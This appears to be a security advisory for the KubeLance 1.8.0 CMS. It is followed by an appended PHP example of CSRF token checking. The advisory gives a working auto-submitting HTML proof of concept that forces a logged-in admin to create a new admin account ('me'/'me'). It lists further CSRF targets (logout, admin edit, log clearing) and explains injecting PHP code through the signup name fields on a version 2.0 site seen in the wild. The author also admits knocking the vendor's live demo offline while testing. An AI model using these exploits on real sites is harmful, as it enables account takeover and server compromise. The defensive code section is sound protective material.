`===========================================================
Vulnerable Software: KubeLance: 1.8.0
Official Site: kubelabs.com
===========================================================
Vuln Desc:
KubeLance: 1.8.0 suffers from multiple CSRF and XSS+HTML injection vulns.
Below I show ONLY CSRF exploitation, but combining it with an XSS payload is possible and exploitable.
(To exploit CSRF+XSS, simply change the form fields and their corresponding values to an XSS payload, that's all.)
===========================================================
Using CSRF vuln in this situation:
Possible #1:
forcing admin to logout:
http://demos.kubelabs.com/kubelance/adm/logout.php
Possible #2:
To change admin user name+password:
adm/admin_edit.php?id=1
Possible #3:
Clear logs:
/adm/log_viewer.php?clear=1
etc.
===========================================================
/*Will affect*/
If a currently logged-in admin visits a crafted page which contains the POC code,
they will be pwned ASAP.
===========================================================
Demo: http://demos.kubelabs.com/kubelance/
Just one POC:
============================== BEGIN OF PROOF OF CONCEPT EXPLOIT ===================================
<html>
<head>
<title>KubeLance: 1.8.0 CSRF exploitation POC</title>
</head>
<p>KubeLance: 1.8.0 CSRF ADD ADMIN POC</p>
<body onload="javascript:document.forms[0].submit()">
<form name="form1" method="post" action="http://CHANGE_TO_RTARGET/kubelance/adm/admin_add.php">
<input name="username" type="hidden" class="textbox" id="username" style="width:60%" value="me">
<input name="password" type="hidden" class="textbox" id="password" style="width:60%" value="me">
</form>
<!-- Username:me -->
<!-- Password:me -->
</body>
</html>
============================== END OF PROOF OF CONCEPT EXPLOIT===================================
Note1: Previous versions may also be affected, but I have not tested them.
Note2:
In the wild: I found a site which uses Kubelance CMS whose *includes/config.php* says it is:
$config['version'] = '2.0';
6149742 -rw-r--r-- 1 ************** apache 2854 Apr 9 2010 config.php
Version 2 (but I can't find that exact version on the vendor site)
Just a note: that version ($config['version'] = '2.0';) is prone to PHP code execution.
During signup, the First name and Last name input boxes can be injected with PHP code,
e.g.:
<?php phpinfo();?>
On submit this gives an error and, as a result, the PHP code executes on the server side:
http://s019.radikal.ru/i618/1203/14/0ab995b456cd.png
Beware: anyone who uses that version: update your software ASAP and check your site for backdoors, change all your configs and your cPanel, FTP and
email passwords, and never use the same passwords everywhere.
My apologies, Kubelance guys:
While testing it online (http://demos.kubelabs.com/kubelance/) I took it down by mistake :D
Sorry 1000 times for this :(
Peace
/AkaStep ^_^
`
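A server-side check that would reject the requests listed above (the auto-submitted admin_add.php form and the plain-URL logout and log-clear actions), as an added example that is not KubeLance's own code and not part of the original advisory. The function names and the `csrf_token` field name are assumptions; arrays stand in for `$_SESSION` and `$_POST` so it runs from the PHP command line.

```php
<?php
// Added example: per-session anti-CSRF token for admin actions.
// Function names and the 'csrf_token' field are assumptions for illustration.
declare(strict_types=1);

/** Return the session's CSRF token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Hidden field to embed in every admin form the panel renders. */
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * Accept a state-changing request only if it is a POST carrying the
 * session's token. GET is rejected outright, so actions reachable by a
 * plain URL (logout, log clearing) can no longer be triggered by a link.
 * In an application, pass $_SERVER['REQUEST_METHOD'], $_POST and $_SESSION.
 */
function csrf_request_ok(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $sent  = $post['csrf_token'] ?? '';
    $known = $session['csrf_token'] ?? '';
    return is_string($sent) && is_string($known) && $known !== ''
        && hash_equals($known, $sent); // constant-time comparison
}

// Constructed demo data: a session with a token and two form submissions.
$session = [];
$token   = csrf_token($session);
$forged  = ['username' => 'me', 'password' => 'me']; // cross-site form, no token
$legit   = $forged + ['csrf_token' => $token];       // form rendered by the panel

var_dump(csrf_request_ok('POST', $forged, $session)); // forged cross-site POST
var_dump(csrf_request_ok('POST', $legit, $session));  // panel's own form
var_dump(csrf_request_ok('GET', $legit, $session));   // state change via GET
```

A token check does not help while the XSS issues the advisory mentions remain, because script running on the admin origin can read the token from the page.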